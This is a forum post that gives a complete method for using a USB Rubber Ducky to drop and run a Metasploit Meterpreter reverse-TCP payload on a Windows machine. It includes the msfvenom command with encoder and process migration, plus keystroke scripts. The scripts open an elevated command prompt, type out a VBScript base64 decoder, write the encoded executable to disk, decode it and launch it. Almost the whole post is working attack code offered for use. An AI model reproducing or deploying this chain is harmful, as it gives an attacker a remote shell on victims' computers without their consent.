Jump to content

Recommended Posts

So I have seen people having issues with doing a download of a meterpreter payload and getting it to run from the ducky.

I went for a different approach. I decided to try to modify this script from the wiki (i think darren did a segment on it) in a different way. Here is what I came up with.

 

  1. Create the exe from msfvenom with the parms to connect the the metasploit handler
  2. Encode the exe with base64
  3. Edit the encoding to be duckyfied
  4. Append the duckyfied encoded exe to met.txt
  5. Append last.txt to met.txt
  6. Duckyencoder to make the inject.bin
  7. Place on ducky sdcard
  8. ...
  9. win

 

 

msfvenom -a x86 --platform windows \
-p windows/meterpreter/reverse_tcp \
LHOST=IP_ADDRESS \
LPORT=PORT \
PREPENDMIGRATE=true \
PREPENDMIGRATEPROC=notepad.exe \
ReverseConnectRetries=20 \
-b '\x00' \
-e x86/shikata_ga_nai \
-f exe |\
base64 > bad_exe.txt
sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt
cat last.txt >> met.txt
java -jar encoder.jar -i met.txt -o inject.bin

Contents of met.txt

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = 
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = 
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function 
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub 
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING copy con c:\bad_exe.txt
ENTER

Contents of last.txt

CTRL z
ENTER
STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe
ENTER
STRING c:\bad.exe
ENTER
STRING exit
ENTER

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...